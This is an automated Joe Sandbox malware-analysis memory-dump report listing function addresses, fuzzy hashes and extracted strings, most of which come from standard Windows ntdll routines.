Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6abc05040bad3464f33adfd00d4656bd7e567f1adc2859e560e22ec111448bb6
Instruction ID: 1cf8af722b767680f3c9f67e7cefcd85eef3a4345ea54030dd8dc400c0550098
Opcode Fuzzy Hash: 6abc05040bad3464f33adfd00d4656bd7e567f1adc2859e560e22ec111448bb6
Instruction Fuzzy Hash: 7790027164180482D142715844056060009A7D0641F95C012A0424598EC655CB96AB61

Function 01BF2DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 018a92713d88c1cc93826299da0e307dec0e222abcfe5dbf8fd65a6d21188ec8
Instruction ID: 3734e59c3b6f2a6823cf595c39e5e8c558d52b8f54f81daf3e4173d0964464e1
Opcode Fuzzy Hash: 018a92713d88c1cc93826299da0e307dec0e222abcfe5dbf8fd65a6d21188ec8
Instruction Fuzzy Hash: 26900261642841D25546B15844055074006A7E0641B95C012A1414994CC526D996D721

Function 01BF2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec3608cfe15cc346a892b587f3ff89b97352348ea61e38f5a3b46d3797c41273
Instruction ID: 503f40132dc636caeb02c265c171c585441e454e9af098fe3ae4e797a64d0a02
Opcode Fuzzy Hash: ec3608cfe15cc346a892b587f3ff89b97352348ea61e38f5a3b46d3797c41273
Instruction Fuzzy Hash: 5990026170180083D141715854196064005E7E1701F55D011E0414598CD915C9965322

Function 01BF2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e51b10529e004bdb191123396a86a432174773568d4c194f6d0f3130baaee0b
Instruction ID: 4ebe383d39e92d3a9613d4e097a063fcb0b29628547121dd4245bd97084c8abd
Opcode Fuzzy Hash: 0e51b10529e004bdb191123396a86a432174773568d4c194f6d0f3130baaee0b
Instruction Fuzzy Hash: FB90026961380082D1817158540960A000597D1602F95D415A001559CCC915C9A95321

Function 01BF2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6e47ac8a82cf1731e2d8387b3ceed32b37a544d0d3628d4df47e35bfdfb1b3a
Instruction ID: 7c4d824507279592463641c3eb55593295e04ca1dd8d71442310384ec4a014c3
Opcode Fuzzy Hash: f6e47ac8a82cf1731e2d8387b3ceed32b37a544d0d3628d4df47e35bfdfb1b3a
Instruction Fuzzy Hash: FB900261605844C2D10175585409A06000597D0605F55D011A10645D9DC635C991A231

Function 01BF2CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 446eebe22a959bcb5e52e991a882451b390665ba4fe2d3673e872952cc85ee5c
Instruction ID: 997b7d6cebafbb29e48d22d496f6d1debf158ab97f566ead2031f9dbd40c893b
Opcode Fuzzy Hash: 446eebe22a959bcb5e52e991a882451b390665ba4fe2d3673e872952cc85ee5c
Instruction Fuzzy Hash: CB90027160180482D10175985409646000597E0701F55D011A5024599EC665C9D16231

Function 01BF2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f9a7ee2551fc1b9e632d5c264ea8ae6ea82423263504909537651fdcb988eae
Instruction ID: f0c1e768bf56518dcc7bdb7ec2c5184100430059a0cba3137742b18d24a29dd8
Opcode Fuzzy Hash: 3f9a7ee2551fc1b9e632d5c264ea8ae6ea82423263504909537651fdcb988eae
Instruction Fuzzy Hash: BF90027160180483D10171585509707000597D0601F55D411A042459CDD656C9916221

Function 01BF2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7805f6fb8adddfead85233aa988f06d34bb6604eecaa6440a600efe3011071e8
Instruction ID: 471dd604133a7f969b5d1d5e9a7fb6a10f51ec9e522ae56cb9de49ff5f35cbb0
Opcode Fuzzy Hash: 7805f6fb8adddfead85233aa988f06d34bb6604eecaa6440a600efe3011071e8
Instruction Fuzzy Hash: CA900261A0580482D14171585419706001597D0601F55D011A0024598DC659CB9567A1

Function 01BF2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 866a84f13996a0ad59a2015b4fdb43df438391c17b16c5e461b8e2205c587e07
Instruction ID: 5d315230ddc7d3cf9ff45dc991578132f1ef152837cc08309b0c5eb3bf6dc644
Opcode Fuzzy Hash: 866a84f13996a0ad59a2015b4fdb43df438391c17b16c5e461b8e2205c587e07
Instruction Fuzzy Hash: E9900271601808C2D10171584405B46000597E0701F55C016A0124698DC615C9917621

Function 01BF2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0edb3ef924592075b84304539d325b1a51d235c9f4af1c2df37a2575b6b5710d
Instruction ID: 856de9b3eb81a323e3a8f4ab3336a845904bb9721d18f514229773530dd61a2f
Opcode Fuzzy Hash: 0edb3ef924592075b84304539d325b1a51d235c9f4af1c2df37a2575b6b5710d
Instruction Fuzzy Hash: 81900261A01800C24141716888459064005BBE1611B55C121A0998594DC559C9A55765

Function 01BF2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ff3b65b6b0d67b93d70774da312f806a80b9dd0e131c9df7de41f8863ce158
Instruction ID: f627fd8117a075876163e740be00a66b861c1e7071d5102462e47488acfbee32
Opcode Fuzzy Hash: 81ff3b65b6b0d67b93d70774da312f806a80b9dd0e131c9df7de41f8863ce158
Instruction Fuzzy Hash: F1900271601C0482D10171584809747000597D0702F55C011A5164599EC665C9D16631

Function 01BF2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 606f7544809eabd46d912cc8a42ae37af4f713ced7a563e42f782d965d57badb
Instruction ID: 205a20af252aa2bceb8e93de8497aba9ca9434cd9674c952a8d39f0d05de49f3
Opcode Fuzzy Hash: 606f7544809eabd46d912cc8a42ae37af4f713ced7a563e42f782d965d57badb
Instruction Fuzzy Hash: F9900271601C0482D1017158481570B000597D0702F55C011A1164599DC625C9916671

Function 01BF2FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d938d809f69413936f1116482784820352ba832eb70e58fcfa1b4c14ef86caf7
Instruction ID: 76674deff4ebe1ef570593fdf8a4a418085720f65c2dfd3854093d2a066a62c2
Opcode Fuzzy Hash: d938d809f69413936f1116482784820352ba832eb70e58fcfa1b4c14ef86caf7
Instruction Fuzzy Hash: 3A900261611C00C2D20175684C15B07000597D0703F55C115A0154598CC915C9A15621

Function 01BF2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9df5fc93145221226d314c7a5e47c757074a0e0ba21b51ea331e3d3f3fe38e5
Instruction ID: 43e600a83a33b9257b271968d8f7a553e2afe8dc100377348cc82078211a643e
Opcode Fuzzy Hash: f9df5fc93145221226d314c7a5e47c757074a0e0ba21b51ea331e3d3f3fe38e5
Instruction Fuzzy Hash: 9F9002A1741804C2D10171584415B060005D7E1701F55C015E1064598DC619CD926226

Function 01BF2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1518d9389e0cd3289e258b0d55dc75b284ed8803d54b4cadd276d987ce81bfb1
Instruction ID: bdbeda4c08590b3dc5a3ac8327167bc1a0169a99abfb470fdcb3c9ef0e3ca0fd
Opcode Fuzzy Hash: 1518d9389e0cd3289e258b0d55dc75b284ed8803d54b4cadd276d987ce81bfb1
Instruction Fuzzy Hash: 4D9002A1611800C2D10571584405706004597E1601F55C012A2154598CC529CDA15225

Function 01BF2EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65bd71bed7376971d5b39f5e1e4eb1c159b6b682769ff40d63f962b6b4121f27
Instruction ID: 869a452cbbf512ca665e3980adb20a441b5428f5d8960e03658c4ba3c3c4c4be
Opcode Fuzzy Hash: 65bd71bed7376971d5b39f5e1e4eb1c159b6b682769ff40d63f962b6b4121f27
Instruction Fuzzy Hash: BC9002B160180482D14171584405746000597D0701F55C011A5064598EC659CED56765

Function 01BF2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ecdebc5e4fb33a539dc0d7cba6dd0c27aaffeffb4da205b7160ebe609bb315
Instruction ID: ade93324b016103f8c5b3dbeb0f74c77e2136f3c341dff7cf5fa836b51d4b6d4
Opcode Fuzzy Hash: 38ecdebc5e4fb33a539dc0d7cba6dd0c27aaffeffb4da205b7160ebe609bb315
Instruction Fuzzy Hash: 11900261A0180582D10271584405616000A97D0641F95C022A1024599ECA25CAD2A231

Function 01BF2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a44070f7dfc45c7fe7c76acd5edc864bb8d50e8e2d5dc8737c904e47b69476a8
Instruction ID: eda0b2734651bb9e6fa8ac01e4cac4b86e1aa4afa63e9f48d9499d8072e918db
Opcode Fuzzy Hash: a44070f7dfc45c7fe7c76acd5edc864bb8d50e8e2d5dc8737c904e47b69476a8
Instruction Fuzzy Hash: 1E9002A1601C0483D14175584805607000597D0702F55C011A2064599ECA29CD916235

Function 01BF2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc096be1c30bc642ff85278d75d94fb0b64478e49ab9cdcde257bd03640f9aa
Instruction ID: 5e3bf1abcf7c8a753069fe1ecfc11667c6d803dd2734b3f719bbc4e15bcb2d1d
Opcode Fuzzy Hash: ffc096be1c30bc642ff85278d75d94fb0b64478e49ab9cdcde257bd03640f9aa
Instruction Fuzzy Hash: 3290026170180482D103715844156060009D7D1745F95C012E1424599DC625CA93A232

Function 01BF3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44792f51c2013b322b9512b5a2ad4f83d92ac23d3cbf6011b05e5e5789f2fd36
Instruction ID: 62111f118fefc43495247c70c29cbe3d919ae3e315b93494cd53482d271dfce9
Opcode Fuzzy Hash: 44792f51c2013b322b9512b5a2ad4f83d92ac23d3cbf6011b05e5e5789f2fd36
Instruction Fuzzy Hash: 6890026164180882D141715884157070006D7D0A01F55C011A0024598DC616CAA567B1

Function 01BF3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd7e2c04c90b488ebd1e8cfe5d8528c9b4ec6f0780cbf724d6f3d9e6a65d7a8
Instruction ID: 4febc3d9a8375d4851a84fef86f0f13f2ecaabb04f24f09caf9b41e48da8f3d1
Opcode Fuzzy Hash: 3cd7e2c04c90b488ebd1e8cfe5d8528c9b4ec6f0780cbf724d6f3d9e6a65d7a8
Instruction Fuzzy Hash: 1E900261601C44C2D14172584805B0F410597E1602F95C019A4156598CC915C9955721

Function 01BF39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3aefd08b2c33fe1b6dd9e580385b1cbf6ba8b40eaf02c62b2d86b03334e619
Instruction ID: 521f80545aa4c8d2e642a71b9d1c17b7443f4cc3057ce06bd883a9dfc74f178e
Opcode Fuzzy Hash: 5d3aefd08b2c33fe1b6dd9e580385b1cbf6ba8b40eaf02c62b2d86b03334e619
Instruction Fuzzy Hash: 9790026164585182D151715C44056164005B7E0601F55C021A08145D8DC555C9956321

Function 01BF3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7597b69cc93d34174e773ec80be4e9a556daa4d491d324535efc979a3fd53c5
Instruction ID: dd914575f9cf57377e4318447041ccbfd3c8650f6f1e70b84d20ceea44f2efd6
Opcode Fuzzy Hash: a7597b69cc93d34174e773ec80be4e9a556daa4d491d324535efc979a3fd53c5
Instruction Fuzzy Hash: CC900271602801C2954172585805A4E410597E1702F95D415A0015598CC914C9A15321

Function 01BF3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 822552a61bbcec6aa4410cfdbd702104d1d9f041c410c88183cd6b76579bc727
Instruction ID: f98e21ffe8b91850a1dcb3f232d99a51063f702cf77de497c676ea2f41c36e94
Opcode Fuzzy Hash: 822552a61bbcec6aa4410cfdbd702104d1d9f041c410c88183cd6b76579bc727
Instruction Fuzzy Hash: 6890027560180482D51171585805646004697D0701F55D411A042459CDC654C9E1A221

Function 01BF2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: b0c8ca9faa7824835c4e1341a3a885c198624614e5ac693941b14b32486db70f
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01BF2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01BF293C
___swprintf_l.LIBCMT ref: 01BF295E
___swprintf_l.LIBCMT ref: 01BF29A3
___swprintf_l.LIBCMT ref: 01C2A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 01C2A527
::ffff:0:%u.%u.%u.%u, xrefs: 01C2A54E
ffff:, xrefs: 01C2A504
:%u.%u.%u.%u, xrefs: 01C2A5B8

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: eef8f8a91e30f4a45f97a5535e543449eb391fc2d08cdd2a3c1243e496d3dfe0
Instruction ID: 7dbe79413b10f4726614fcee296ca85d40f15f305653d7d509cd1b22bc01df40
Opcode Fuzzy Hash: eef8f8a91e30f4a45f97a5535e543449eb391fc2d08cdd2a3c1243e496d3dfe0
Instruction Fuzzy Hash: 7851E3B6A00556AFCB29DBAC888097EFBB8FB08240B50C2EDE565D7641D334DE5487A0

Function 01C62410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01C624A6
___swprintf_l.LIBCMT ref: 01C624E2
___swprintf_l.LIBCMT ref: 01C6257D
___swprintf_l.LIBCMT ref: 01C625A3
___swprintf_l.LIBCMT ref: 01C625C8
___swprintf_l.LIBCMT ref: 01C62608

Strings

:%u.%u.%u.%u, xrefs: 01C625FF
::ffff:0:%u.%u.%u.%u, xrefs: 01C624DA
::%hs%u.%u.%u.%u, xrefs: 01C6249E
ffff:, xrefs: 01C6247D, 01C6249D

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 2f552bdaf1e2aa7b25487ec1791ea58db49fae90a6f35ba74afc73c9af216a72
Instruction ID: 7450ff75e919ca5bcceb493a089e82ebc55ac998fefb6dced4c7fa8ad68748b0
Opcode Fuzzy Hash: 2f552bdaf1e2aa7b25487ec1791ea58db49fae90a6f35ba74afc73c9af216a72
Instruction Fuzzy Hash: 9951E375A00646EECB35DE9DC8D09BEBBFCEF44200B44845AE5D6D7682E674EA408760

Function 01BE7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01C24655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01C246FC
Execute=1, xrefs: 01C24713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01C24787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01C24742
ExecuteOptions, xrefs: 01C246A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01C24725

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 9d4cdf8003ae3a69684b9b738ddbbd03e84e64220b370579887a584d463c04e5
Instruction ID: 191e4e8a3797250347f1b8aeb0a5469d98a61e05365bb3904f005d2ef9e89382
Opcode Fuzzy Hash: 9d4cdf8003ae3a69684b9b738ddbbd03e84e64220b370579887a584d463c04e5
Instruction Fuzzy Hash: 79511B3160021AAFEF19AAA8DC4DFAA77E8EF14704F0400E9E605AB190DB71DA458F90

Function 01C86940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: 268eac59bc93a5228b66044efa49e5a14d07bc017a7b42cadf276fe85b195187
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 41023671508342EFD709EF18C494A6BBBE5EFC8708F14896DFA894B260DB31E945CB52

Function 01BFB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01BFB6BF

Strings

+, xrefs: 01BFB65A
0, xrefs: 01BFB695
0, xrefs: 01BFB66F
-, xrefs: 01BFB650

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: e8dc81483d05783275b948df022bd873c5c2c7dd0c737a48b8f27525837ed5f4
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: F481C470E052499EEF2D8E6CCA517FEBBB2EF85310F18429DEA51A7291C7349848CB51

Function 01C620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01C6214F
___swprintf_l.LIBCMT ref: 01C62172

Strings

%%%u, xrefs: 01C62146
[, xrefs: 01C6212B
]:%u, xrefs: 01C62169

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 69365a1817d6a95f986b9ff0ee83f5e886d5215a6ef6ad2bec9343f7174db475
Instruction ID: fcd8f75e4328e5253d31a3b4ebb7d8eb12f7f8a2d8cd14532fad785a8cba3d40
Opcode Fuzzy Hash: 69365a1817d6a95f986b9ff0ee83f5e886d5215a6ef6ad2bec9343f7174db475
Instruction Fuzzy Hash: B421517AE04119EBDB15DFA9C880AEEBBFCAF54644F44015AEA05E3240E730DA059BA1

Function 01BDF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01C2031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01C202BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01C202E7

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: d4aefd24054633ebadf26947e0b9890a9d0f517d2043bff811618ede7841060d
Instruction ID: fbc314b8de3f12c277b9967fa147a2e2e68c9515b269b745301e5bc6115095d0
Opcode Fuzzy Hash: d4aefd24054633ebadf26947e0b9890a9d0f517d2043bff811618ede7841060d
Instruction Fuzzy Hash: 23E1BF30608741DFD729CF28C884B2ABBE0FB45714F140A9EF5568B2E1E774D956CB42

Function 01BEBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01C27B7F
RTL: Re-Waiting, xrefs: 01C27BAC
RTL: Resource at %p, xrefs: 01C27B8E

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 17879375086fe7cb0daec033c5b32ab0905f8ea3a0d5c992127e71220aa9b7af
Instruction ID: 58c266c57b2b9f3a43930f181511a4e8b6f4b376004b3f56e8bb0686be555b36
Opcode Fuzzy Hash: 17879375086fe7cb0daec033c5b32ab0905f8ea3a0d5c992127e71220aa9b7af
Instruction Fuzzy Hash: 864114317007039FDB29DE29C950B6BB7E5EF98710F000A6DFA56DB690DB31E9058B91

